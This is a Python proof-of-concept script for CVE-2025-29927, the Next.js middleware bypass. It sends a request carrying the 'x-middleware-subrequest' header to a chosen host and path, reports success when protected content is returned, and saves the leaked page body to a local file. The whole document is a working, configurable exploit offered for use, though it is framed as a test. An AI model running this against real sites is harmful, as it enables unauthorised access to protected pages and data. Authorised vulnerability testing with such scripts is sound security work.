import http.client import argparse import socket import asyncio from colorama import init, Fore, Style from datetime import datetime init() colors = { 'reset': Style.RESET_ALL, 'red': Fore.RED, 'green': Fore.GREEN, 'yellow': Fore.YELLOW, 'blue': Fore.BLUE, 'magenta': Fore.MAGENTA, 'cyan': Fore.CYAN, 'white': Fore.WHITE } def print_banner(): banner = f""" {colors['cyan']} ╔════════════════════════════════════════════════════╗ ║ CVE-2025-29927 Next.js Middleware Bypass Test ║ ║ Created by: [ThemeHackers] ║ ║ Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')} ║ ╚════════════════════════════════════════════════════╝{colors['reset']} """ print(banner) def make_request(hostname, port, path, method, headers={}): conn = None try: socket.gethostbyname(hostname) conn = http.client.HTTPConnection(hostname, port, timeout=15) conn.request(method, path, headers=headers) res = conn.getresponse() body = res.read().decode('utf-8', errors='ignore') response = { 'status_code': res.status, 'headers': dict(res.getheaders()), 'body': body, 'location': res.getheader('location') } return response except socket.gaierror: raise Exception("Hostname resolution failed - Check your DNS or target address") except socket.timeout: raise Exception("Connection timed out - Target may be down or blocked") except ConnectionRefusedError: raise Exception("Connection refused - Check if server is running") except Exception as e: raise Exception(f"Unexpected error: {str(e)}") finally: if conn: conn.close() def save_body_to_file(body, filename="vuln_middleware.html"): try: timestamp = datetime.now().strftime('%Y-%m-%d_%H-%M-%S') with open(filename, 'a', encoding='utf-8') as f: f.write(f"\n{body}\n\n") return True except IOError as e: print(f"{colors['red']}Error saving to file: {e}{colors['reset']}") return False except Exception as e: print(f"{colors['red']}Unexpected error while saving: {e}{colors['reset']}") return False def print_formatted_response(test_name, response, content_check): status_color = colors['green'] if response['status_code'] < 400 else colors['red'] print(f"{colors['yellow']}┌─[{test_name}]─{colors['reset']}") print(f"│ Status: {status_color}{response['status_code']}{colors['reset']}") if response['location']: print(f"│ Location: {colors['blue']}{response['location']}{colors['reset']}") success = response['status_code'] != 307 if success: has_content = content_check in response['body'] if has_content: print(f"│ {colors['red']}VULNERABLE: Protected content accessed!{colors['reset']}") snippet = response['body'][:200] + "..." if len(response['body']) > 200 else response['body'] print(f"│ Body snippet: {colors['white']}\"{snippet}\"${colors['reset']}") else: print(f"│ {colors['blue']}Success but no protected content found{colors['reset']}") else: print(f"│ {colors['green']}Not vulnerable (redirected){colors['reset']}") print(f"{colors['yellow']}└{'─' * 50}{colors['reset']}") async def run_test(args): print_banner() print(f"{colors['magenta']}Target: {args.method} {args.hostname}:{args.port}{args.path}{colors['reset']}\n") header_variations = [ ['Normal Request (No Header)', {}], ['Exploit with "middleware" value', {'x-middleware-subrequest': args.header_value}] ] for test_name, headers in header_variations: print(f"{colors['yellow']}Testing: {test_name}{colors['reset']}") try: response = make_request( hostname=args.hostname, port=args.port, path=args.path, method=args.method, headers=headers ) print_formatted_response(test_name, response, args.content_check) if response['status_code'] != 307 and args.content_check in response['body']: if save_body_to_file(response['body']): print(f"{colors['green']}✓ Response saved to vuln_middleware.html{colors['reset']}") else: print(f"{colors['red']}✗ Failed to save response{colors['reset']}") except Exception as e: print(f"{colors['red']}✗ Error: {e}{colors['reset']}") print("") print(f"{colors['cyan']}=== Test Completed at {datetime.now().strftime('%H:%M:%S')} ==={colors['reset']}") def parse_arguments(): parser = argparse.ArgumentParser( description='Test for CVE-2025-29927 Next.js Middleware Bypass Vulnerability', formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument('--hostname', default='localhost', help='Target hostname or IP') parser.add_argument('--port', type=int, default=3000, help='Target port') parser.add_argument('--path', default='/protected', help='Target path') parser.add_argument('--method', default='GET', choices=['GET', 'POST', 'PUT', 'DELETE'], help='HTTP method') parser.add_argument('--header-value', default='middleware', help='Value for x-middleware-subrequest header') parser.add_argument('--content-check', default='Protected Content', help='String to check in response body') return parser.parse_args() if __name__ == "__main__": try: args = parse_arguments() asyncio.run(run_test(args)) except KeyboardInterrupt: print(f"\n{colors['yellow']}Test interrupted by user{colors['reset']}") except Exception as e: print(f"{colors['red']}Fatal error: {e}{colors['reset']}")